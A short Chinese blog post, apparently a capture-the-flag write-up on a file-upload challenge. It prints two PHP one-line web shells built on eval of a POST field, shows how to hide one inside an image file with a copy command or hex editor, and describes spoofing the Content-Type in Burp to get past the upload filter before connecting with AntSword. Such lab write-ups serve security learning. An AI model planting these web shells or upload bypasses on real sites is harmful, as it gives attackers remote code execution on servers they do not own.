✨PHP一句話木馬

<?php @eval($_POST["pass"]);?>

<?php eval($_REQUEST["pass"]);?>

詳情可瀏覽：Web安全-一句話木馬

✨製作圖片馬

1)copy命令

copy 1.png/b+1.php/a pic.php

！！！不要使用powershell 請使用cmd

//powershell中copy命令應該命令引數不一樣 導致各種報錯

2）文字編輯器/十六進位制編輯器

用文字編輯器/十六進位制編輯器開啟圖片在末尾新增一句話木馬

然後儲存為xxx.php

//經過測試後續也可以蟻劍連線 和copy命令比較只是檔案末尾少了個1A（檔案結束符）

知識擴充套件：ASCII碼0x1A使檔案意外結束的處理方法

✨Burp改包

Burp開啟proxy後對檔案上傳submit抓包

然後修改Content-Type為image/png

！注意修改位置

//靶場環境只允許PNG、JPG、GIF格式檔案上傳 改包繞過

✨蟻劍連線

獲得flag

結束。

✨圖片馬注意點

開始遇到問題蟻劍一直連線失敗

後來選用了較為簡單的圖片製作圖片馬蟻劍就連線成功了

製作圖片馬的圖片一定要簡單 越簡單越好

比如下面這樣的

⭐轉載請註明出處

本文作者：雙份濃縮馥芮白

原文連結：https://www.cnblogs.com/Flat-White/p/13673112.html

版權所有，如需轉載請註明出處。